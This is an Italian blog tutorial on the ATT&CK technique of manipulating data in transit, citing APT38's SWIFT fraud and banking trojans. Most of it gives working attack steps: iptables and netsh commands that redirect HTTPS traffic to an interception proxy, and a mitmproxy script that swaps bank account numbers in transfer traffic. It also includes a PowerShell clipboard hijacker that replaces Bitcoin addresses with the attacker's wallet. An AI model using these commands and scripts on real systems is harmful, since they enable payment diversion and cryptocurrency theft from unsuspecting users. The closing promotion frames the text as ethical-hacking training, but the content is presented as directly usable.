Data Hijacking: Transmitted Data Manipulation (T1565.002)
La manipolazione dei dati in transito rappresenta una minaccia critica all'integrità delle informazioni aziendali. Questa tecnica permette agli attaccanti di alterare i dati mentre viaggiano tra sistemi o verso lo storage, compromettendo processi decisionali e nascondendo le proprie tracce.
L'impatto si colloca nella fase Impact (TA0040) della kill chain, dove l'obiettivo è distorcere la percezione della realtà aziendale. APT38, il gruppo nordcoreano specializzato in cyber-furto bancario, ha dimostrato la devastante efficacia di questa tecnica manipolando messaggi SWIFT durante il trasferimento di 81 milioni di dollari dalla Bank of Bangladesh.
La complessità varia dal semplice clipboard hijacking dei trojan bancari brasiliani come Metamorfo e Melcoz, che sostituiscono indirizzi Bitcoin al volo, fino alle sofisticate alterazioni di LightNeuron che modifica email Microsoft Exchange durante il transito. La manipolazione richiede spesso expertise specifico del sistema target e accesso prolungato per comprendere i flussi dati critici.
Iniziamo con l'intercettazione base su Linux utilizzando iptables per redirigere il traffico. Il comando iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443 devia le connessioni HTTPS verso un proxy locale. Per Windows, netsh offre funzionalità simili con netsh interface portproxy add v4tov4 listenport=8443 connectaddress=target.com connectport=443.
La manipolazione vera e propria richiede un proxy MITM come mitmproxy. Su Linux: mitmdump -s modify_script.py -p 8443 --ssl-insecure dove modify_script.py contiene la logica di alterazione. Un esempio pratico sostituisce numeri di conto bancario nei POST HTTP:
def response(flow):
if "transfer" in flow.request.path:
flow.response.text = flow.response.text.replace("ACC123456", "ACC666666")
Per replicare l'attacco clipboard di Metamorfo su Windows, monitora e sostituisci con PowerShell. Il seguente snippet intercetta indirizzi Bitcoin:
while($true){$clip = Get-Clipboard; if($clip -match '^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$'){Set-Clipboard 'TUO_WALLET_BTC'}; Start-Sleep -Milliseconds 500}
Su macOS, pbpaste e pbcopy permettono manipolazioni simili. Per intercettare email come LightNeuron, configura un Transport Agent su Exchange che altera i messaggi. Il componente critico è timing: la manipolazione deve essere istantanea per non destare sospetti.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo